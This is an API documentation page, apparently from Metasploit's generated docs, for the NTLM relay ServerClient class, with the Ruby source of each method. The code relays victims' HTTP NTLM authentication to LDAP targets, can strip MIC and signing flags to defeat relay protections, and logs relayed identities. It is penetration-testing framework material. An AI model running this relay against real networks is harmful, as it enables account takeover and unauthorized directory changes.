Class: Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient

Inherits:

Object

• Object
• Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient

Defined in:

lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb

Instance Attribute Summary

• #cli ⇒ Object

  Returns the value of attribute cli.

• #logger ⇒ Object readonly

  Returns the value of attribute logger.

• #redirect_uri ⇒ Object

  Returns the value of attribute redirect_uri.

• #state ⇒ Object

  Returns the value of attribute state.

Instance Method Summary

• #abort_connection(reason) ⇒ Object
• #advance_to_next_target_via_redirect ⇒ Object
• #complete_current_relay_attempt(is_success:, identity: nil) ⇒ Object
• #create_relay_client(target, timeout) ⇒ Object
• #extract_ntlm_message(auth_header) ⇒ Object
• #finished? ⇒ Boolean
• #handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type) ⇒ Object
• #handle_type3(parsed_type3) ⇒ Object
• #initialize(cli, relay_targets, logger, timeout = 25) ⇒ ServerClient constructor

  A new instance of ServerClient.

• #process_request(req) ⇒ Object
• #send_401_challenge ⇒ Object
• #unwrap_ntlm_base64(b64_msg) ⇒ Object

Constructor Details

#initialize(cli, relay_targets, logger, timeout = 25) ⇒ ServerClient

Returns a new instance of ServerClient.

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 9

def initialize(cli, relay_targets, logger, timeout = 25)
  @cli                 = cli
  @state               = :unauthenticated
  @relay_targets       = relay_targets
  @logger              = logger
  @timeout             = timeout
  @relayed_connection  = nil
  @current_target      = nil

  @ntlm_context   = {
    wrapper: :none,
    type1: nil,
    type2: nil
  }
end

Instance Attribute Details

#cli ⇒ Object

Returns the value of attribute cli.

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7

def cli
  @cli
end

#logger ⇒ Object (readonly)

Returns the value of attribute logger.

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 6

def logger
  @logger
end

#redirect_uri ⇒ Object

Returns the value of attribute redirect_uri.

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7

def redirect_uri
  @redirect_uri
end

#state ⇒ Object

Returns the value of attribute state.

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7

def state
  @state
end

Instance Method Details

#abort_connection(reason) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 282

def abort_connection(reason)
  logger.print_error("Aborting connection with #{cli.peerhost}: #{reason}")

  res = Rex::Proto::Http::Response.new
  res.code = 400
  res.message = "Bad Request"
  res.headers['Connection'] = "Close"
  res.headers['Content-Length'] = "0"
  res.body = ""
  cli.put(res.to_s)
  @state = :aborted
end

#advance_to_next_target_via_redirect ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 248

def advance_to_next_target_via_redirect
  @current_target = @relay_targets.next(@cli.peerhost)

  if @current_target
    random_path = "/" + Rex::Text.rand_text_alphanumeric(10)

    @redirect_uri = random_path
    @logger.print_status("Moving to next target (#{@current_target.ip}). Issuing 307 Redirect to #{random_path}")

    res = Rex::Proto::Http::Response.new
    res.code = 307
    res.message = "Temporary Redirect"
    res.headers['Location'] = random_path

    res.headers['Connection'] = "keep-alive"
    res.headers['Content-Length'] = "0"

    cli.send_response(res)

    @state = :unauthenticated
    @ntlm_context[:type1] = nil
    @ntlm_context[:type2] = nil
  else
    @logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
    res = Rex::Proto::Http::Response.new
    res.code = 404
    res.message = "Not Found"
    res.headers['Connection'] = "close"
    res.headers['Content-Length'] = "0"

    cli.send_response(res)
    @state = :done
  end
end

#complete_current_relay_attempt(is_success:, identity: nil) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 183

def complete_current_relay_attempt(is_success:, identity: nil)
  return unless @current_target

  @relay_targets.on_relay_end(@current_target, identity: identity, is_success: is_success)
end

#create_relay_client(target, timeout) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 75

def create_relay_client(target, timeout)
  case target.protocol
  when :ldap
    client = Msf::Exploit::Remote::Relay::NTLM::Target::LDAP::Client.create(self, target, logger, timeout)
  else
    raise RuntimeError, "unsupported protocol: #{target.protocol}"
  end

  client
rescue ::Rex::ConnectionTimeout => e
  msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target"
  elog(msg, error: e)
  logger.print_error msg
  nil
rescue ::Exception => e
  msg = "Unable to create relay to #{target}"
  elog(msg, error: e)
  logger.print_error msg
  nil
end

#extract_ntlm_message(auth_header) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 317

def extract_ntlm_message(auth_header)
  return nil unless auth_header

  # Match either "NTLM <base64>" or "Negotiate <base64>" (case insensitive)
  if auth_header =~ /^(NTLM|Negotiate)\s+(.+)$/i
    return $1, $2 # Return The auth type and the base64 message
  end

  nil
end

#finished? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 96

def finished?
  state == :done || state == :aborted
end

#handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 113

def handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
  @ntlm_context[:type1] = raw_ntlm_bytes
  @current_target ||= @relay_targets.next(cli.peerhost)

  if @current_target.nil?
    logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
    res = Rex::Proto::Http::Response.new
    res.code = 404
    res.message = "Not Found"
    res.headers['Connection'] = "Close"
    res.headers['Content-Length'] = "0"
    cli.send_response(res)
    @state = :done
    return
  end

  begin
    logger.print_status("Attempting to relay to #{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}")
    @relayed_connection = create_relay_client(@current_target, @timeout)

    if @relayed_connection.nil?
      logger.print_error("Connection to #{@current_target.ip} failed: unable to create relay client")
      advance_to_next_target_via_redirect
      return
    end

    if @current_target.drop_mic_and_sign_key_exch_flags
      incoming_security_buffer = do_drop_mic_and_flags(parsed_ntlm)
    elsif @current_target.drop_mic_only
      incoming_security_buffer = do_drop_mic(parsed_ntlm)
    else
      incoming_security_buffer = parsed_ntlm.serialize
    end

    relay_result = @relayed_connection.relay_ntlmssp_type1(incoming_security_buffer)

    if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
      type2_msg = relay_result.message
      @ntlm_context[:type2] = type2_msg

      if @ntlm_context[:wrapper] == :gss_spnego
        wrapped_type2 = RubySMB::Gss.gss_type2(type2_msg.serialize)
        target_type2_msg = Rex::Text.encode_base64(wrapped_type2)
        auth_header = "#{auth_type} #{target_type2_msg}"
      else
        target_type2_msg = Rex::Text.encode_base64(type2_msg.serialize)
        auth_header = "#{auth_type} #{target_type2_msg}"
      end
      logger.print_status("Received type2 from target #{@current_target.protocol}://#{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}, attempting to relay back to client")
      res = Rex::Proto::Http::Response.new
      res.code = 401
      res.message = "Unauthorized"
      res.headers['WWW-Authenticate'] = auth_header
      res.headers['Connection'] = "Keep-Alive"
      res.headers['Content-Length'] = "0"

      cli.send_response(res)
      @state = :awaiting_type3
      return
    else
      logger.print_error("Target #{@current_target.ip} rejected the Type 1 message.")
    end

  rescue ::Exception => e
    logger.print_error("Connection to #{@current_target.ip} failed: #{e.message}")
  end

  advance_to_next_target_via_redirect
end

#handle_type3(parsed_type3) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 189

def handle_type3(parsed_type3)
  relay_succeeded = false
  relay_completed = false

  # 1. Safely extract the identity from the Type 3 message early
  identity = nil
  if parsed_type3
    domain = parsed_type3.domain.to_s.force_encoding('UTF-8')
    user = parsed_type3.user.to_s.force_encoding('UTF-8')
    identity = "#{domain}\\#{user}" unless user.empty?
  end

  if @current_target.drop_mic_and_sign_key_exch_flags
    incoming_security_buffer = do_drop_mic_and_flags(parsed_type3)
  elsif @current_target.drop_mic_only
    incoming_security_buffer = do_drop_mic(parsed_type3)
  else
    incoming_security_buffer = parsed_type3.serialize
  end

  relay_result = @relayed_connection.relay_ntlmssp_type3(incoming_security_buffer)

  if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
    relay_succeeded = true

    logger.on_ntlm_type3(
      address: @relayed_connection.target.ip,
      ntlm_type1: @ntlm_context[:type1],
      ntlm_type2: @ntlm_context[:type2],
      ntlm_type3: parsed_type3,
      service_name: 'HTTP'
    )

    if identity.blank?
      logger.print_status("Anonymous Identity - Successfully authenticated against relay target #{@relayed_connection.target.ip}")
      @relayed_connection.disconnect! if @relayed_connection
    else
      logger.print_good("Identity: #{identity} -  Successfully relayed NTLM authentication to LDAP!")
      logger.on_relay_success(relay_connection: @relayed_connection, relay_identity: identity)
    end

    @relayed_connection = nil
  else
    logger.print_error("Relayed authentication failed or was rejected by LDAP.")
    @relayed_connection.disconnect! if @relayed_connection
    @relayed_connection = nil
  end

  complete_current_relay_attempt(is_success: relay_succeeded, identity: identity)
  relay_completed = true

  @state = :done

  advance_to_next_target_via_redirect
rescue StandardError => e
  logger.print_error("Relaying type 3 message to target #{@current_target.ip} failed: #{e.message}")
  complete_current_relay_attempt(is_success: false, identity: identity) unless relay_completed
end

#process_request(req) ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 25

def process_request(req)
  logger.print_status("Processing request in state #{state} from #{cli.peerhost}")
  auth_header = req.headers['Authorization']
  auth_type, b64_message = extract_ntlm_message(auth_header)

  parsed_ntlm = nil
  raw_ntlm_bytes = nil

  if b64_message
    begin
      raw_ntlm_bytes = unwrap_ntlm_base64(b64_message)
      parsed_ntlm = Net::NTLM::Message.parse(raw_ntlm_bytes)
    rescue ::Exception => e
      logger.print_error("Failed to parse incoming NTLM/SPNEGO message: #{e.message}")
      abort_connection("Invalid NTLM payload.")
      return
    end
  end

  case state
  when :unauthenticated
    if parsed_ntlm.nil?
      send_401_challenge
    elsif parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
      logger.print_status("Received Type 1 message from #{cli.peerhost}, attempting to relay...")
      handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
    else
      abort_connection("Expected No Auth or Type 1, got something else.")
    end

  when :awaiting_type3
    if parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type3)
      logger.print_status("Received Type 3 message from #{cli.peerhost}, attempting to relay...")
      handle_type3(parsed_ntlm)

    elsif parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
      logger.print_warning("Client restarted the handshake! Resetting state to handle new Type 1...")
      @relayed_connection.disconnect! if @relayed_connection
      @relayed_connection = nil
      handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)

    else
      abort_connection("Expected Type 3, got something else.")
    end

  when :done
    # The relay is finished for this connection, ignore further requests
  end
end

#send_401_challenge ⇒ Object

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 101

def send_401_challenge
  res = Rex::Proto::Http::Response.new
  res.code = 401
  res.message = "Unauthorized"
  res.headers['WWW-Authenticate'] = "NTLM, Negotiate"
  res.headers['Connection'] = "Keep-Alive"
  res.headers['Content-Length'] = "0"
  res.body = ""

  cli.put(res.to_s)
end

#unwrap_ntlm_base64(b64_msg) ⇒ Object

Raises:

• (ArgumentError)

# File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 295

def unwrap_ntlm_base64(b64_msg)
  buf = Rex::Text.decode_base64(b64_msg)

  if valid_ntlm_blob?(buf)
    @ntlm_context[:wrapper] = :none
    return buf
  end

  gss_api = OpenSSL::ASN1.decode(buf)
  if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
    logger.print_status("Detected GSS-SPNEGO wrapping around the type1 NTLM message")
    @ntlm_context[:wrapper] = :gss_spnego
    return process_gss_spnego_init(buf)
  elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
    logger.print_status("Detected GSS-SPNEGO wrapping around the type3 NTLM message")
    @ntlm_context[:wrapper] = :gss_spnego
    return process_gss_spnego_targ(buf)
  end

  raise ArgumentError, "Unrecognized NTLM or SPNEGO payload"
end